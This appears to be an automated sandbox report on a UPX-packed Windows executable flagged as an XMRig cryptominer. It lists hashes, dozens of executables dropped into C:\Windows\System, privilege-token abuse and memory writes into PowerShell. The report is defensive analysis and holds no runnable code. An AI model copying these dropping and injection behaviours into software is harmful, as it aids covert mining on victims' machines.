Malware Analysis Report

2025-01-06 21:19

Sample ID 240614-pjct4atgrn
Target bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe
SHA256 85de902a28f74c8f8839630ac45fe16a0e48afdd4cadfb2d80ae566c251bf849
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

85de902a28f74c8f8839630ac45fe16a0e48afdd4cadfb2d80ae566c251bf849

Threat Level: Known bad

The file bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 12:21

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 12:21

Reported

2024-06-14 12:23

Platform

win7-20240508-en

Max time kernel

150s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\oDPBQIQ.exe N/A
N/A N/A C:\Windows\System\tqhAMxb.exe N/A
N/A N/A C:\Windows\System\POdHwHR.exe N/A
N/A N/A C:\Windows\System\TIWsFDf.exe N/A
N/A N/A C:\Windows\System\seKOSuA.exe N/A
N/A N/A C:\Windows\System\JnefrXJ.exe N/A
N/A N/A C:\Windows\System\KRiNZZp.exe N/A
N/A N/A C:\Windows\System\SyEIImC.exe N/A
N/A N/A C:\Windows\System\AayZXHV.exe N/A
N/A N/A C:\Windows\System\WiVyPKP.exe N/A
N/A N/A C:\Windows\System\hXsTflt.exe N/A
N/A N/A C:\Windows\System\fBfEBeF.exe N/A
N/A N/A C:\Windows\System\UpoUfzq.exe N/A
N/A N/A C:\Windows\System\HFSGnQP.exe N/A
N/A N/A C:\Windows\System\RKjJVMS.exe N/A
N/A N/A C:\Windows\System\YokvJNy.exe N/A
N/A N/A C:\Windows\System\SGUyGDO.exe N/A
N/A N/A C:\Windows\System\WQVgMPI.exe N/A
N/A N/A C:\Windows\System\bWaLAtG.exe N/A
N/A N/A C:\Windows\System\zGcQlbp.exe N/A
N/A N/A C:\Windows\System\qbtqdta.exe N/A
N/A N/A C:\Windows\System\hPtQwZO.exe N/A
N/A N/A C:\Windows\System\yjySaDz.exe N/A
N/A N/A C:\Windows\System\AsmAnry.exe N/A
N/A N/A C:\Windows\System\PafKfmd.exe N/A
N/A N/A C:\Windows\System\wYazokD.exe N/A
N/A N/A C:\Windows\System\SLDZdsd.exe N/A
N/A N/A C:\Windows\System\PQfanMj.exe N/A
N/A N/A C:\Windows\System\kCbWrSz.exe N/A
N/A N/A C:\Windows\System\KrGWRBQ.exe N/A
N/A N/A C:\Windows\System\CHfzTcE.exe N/A
N/A N/A C:\Windows\System\ZSubHxO.exe N/A
N/A N/A C:\Windows\System\BBcQHAC.exe N/A
N/A N/A C:\Windows\System\eeXwOVL.exe N/A
N/A N/A C:\Windows\System\ehzPLUN.exe N/A
N/A N/A C:\Windows\System\FfwQfjL.exe N/A
N/A N/A C:\Windows\System\VZWDNMY.exe N/A
N/A N/A C:\Windows\System\iCfNnpz.exe N/A
N/A N/A C:\Windows\System\zzSgnzA.exe N/A
N/A N/A C:\Windows\System\GxWryjP.exe N/A
N/A N/A C:\Windows\System\pGkFRLR.exe N/A
N/A N/A C:\Windows\System\jqIuthj.exe N/A
N/A N/A C:\Windows\System\flrhmyV.exe N/A
N/A N/A C:\Windows\System\csEOIDm.exe N/A
N/A N/A C:\Windows\System\aOWCwSB.exe N/A
N/A N/A C:\Windows\System\fBBmzTo.exe N/A
N/A N/A C:\Windows\System\FDJnmrP.exe N/A
N/A N/A C:\Windows\System\fhTbUIM.exe N/A
N/A N/A C:\Windows\System\mlcBZIT.exe N/A
N/A N/A C:\Windows\System\TgfZPAi.exe N/A
N/A N/A C:\Windows\System\xlXzCLF.exe N/A
N/A N/A C:\Windows\System\HDGYFRc.exe N/A
N/A N/A C:\Windows\System\lRInIVx.exe N/A
N/A N/A C:\Windows\System\gCfOCLc.exe N/A
N/A N/A C:\Windows\System\anBGYdE.exe N/A
N/A N/A C:\Windows\System\uPJBrYP.exe N/A
N/A N/A C:\Windows\System\geDuKSP.exe N/A
N/A N/A C:\Windows\System\DSrpTra.exe N/A
N/A N/A C:\Windows\System\bfCggbx.exe N/A
N/A N/A C:\Windows\System\kznAyWV.exe N/A
N/A N/A C:\Windows\System\AenWSLa.exe N/A
N/A N/A C:\Windows\System\Pngmqig.exe N/A
N/A N/A C:\Windows\System\QEJZoss.exe N/A
N/A N/A C:\Windows\System\cObxxzr.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ipUgxvw.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cIEucgu.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\gbxdrGR.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\UcYPmoU.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jmfJdNr.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\xlqybMI.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\rkvnaep.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GQmJXRD.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\AScsGeo.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\fTUigJj.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\pbnAvkj.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\QmmzkIR.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\lRkXgwz.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jYJjiKN.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\MQSzlbN.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\VsAhtCg.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jObfqlf.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\yJDxYWy.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YIXFDVm.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\QteVSAc.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\lFmigCu.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YcaxDJA.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\xaUzxZu.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\pJmshTE.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\gVsbcKn.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LHrppsx.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\pxoPiZS.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZuyXOro.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\gGFjWLw.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BgodUHJ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ccdhkOM.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YgVgbXo.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\OSaRXiE.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BPtxbkM.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\HWljMsS.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\iGgFeIY.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\erLnIuG.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ygzNMKy.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\CZtllSZ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LeQgUyt.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\FUOUaXD.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZAlLXNm.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\QZHyEIO.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hUNZXZn.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kyxbSnu.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\qyqwgOO.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\HrYJzAt.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WRaazWY.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GlvfsGL.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ovrQJLl.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\Pclkrew.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\HQJiBOL.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YJaKtuc.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\vwbZXYy.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\mNgcXFC.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ixWurSs.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\SKdhMIb.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jVUIemJ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\VXJSjaf.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\trIRhcl.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\zsZYBUg.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WsahFmo.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\QCqfdTL.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\zUSwNTw.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2928 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2928 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2928 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2928 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\oDPBQIQ.exe
PID 2928 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\oDPBQIQ.exe
PID 2928 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\oDPBQIQ.exe
PID 2928 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\tqhAMxb.exe
PID 2928 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\tqhAMxb.exe
PID 2928 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\tqhAMxb.exe
PID 2928 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\POdHwHR.exe
PID 2928 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\POdHwHR.exe
PID 2928 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\POdHwHR.exe
PID 2928 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\KRiNZZp.exe
PID 2928 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\KRiNZZp.exe
